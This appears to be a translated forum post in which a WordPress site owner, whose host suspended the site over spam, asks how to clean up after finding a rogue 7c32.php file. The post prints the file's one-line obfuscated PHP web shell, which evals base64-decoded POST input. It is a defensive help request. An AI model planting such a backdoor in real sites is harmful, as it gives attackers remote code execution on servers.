<分区>
我的托管服务提供商最近暂停了我的网站,因为网站上的某些内容正在发送大量垃圾邮件。最初我和供应商认为这是由于我几天前在服务器上放置的电子邮件事件的不安全表格造成的。我从服务器上删除了带有表单的页面,但服务器仍在发送垃圾邮件。
我在服务器根目录的“css”文件夹中发现了一个名为7c32.php的php文件。我绝对没有做到。这是文件中的代码:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
通过在线解码器运行它后,它得出了以下结果:
if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));
我阅读了一些有关恶意 php 文件的资料,发现 eval( 和 base64_decode 字符串非常可疑。我查看了服务器日志文件,看到几个来自沙特阿拉伯 IP 地址的 7c32.php 文件的帖子查询.
我删除了 php 文件,更新了所有过时的 wordpress 主题和插件(以及平台本身,并将 FTP 服务器和 Wordpress 管理帐户的密码更改为更安全的密码。
我还能做些什么来确保我的服务器安全吗?我正要去搜索这些 base64 和 eval( 服务器上所有其他 php 文件中的字符串,但除此之外,我没有想法。
这个 php 脚本似乎太短了,不会造成任何损害,但是还有什么可以发送所有垃圾邮件呢?
如有任何帮助,我们将不胜感激。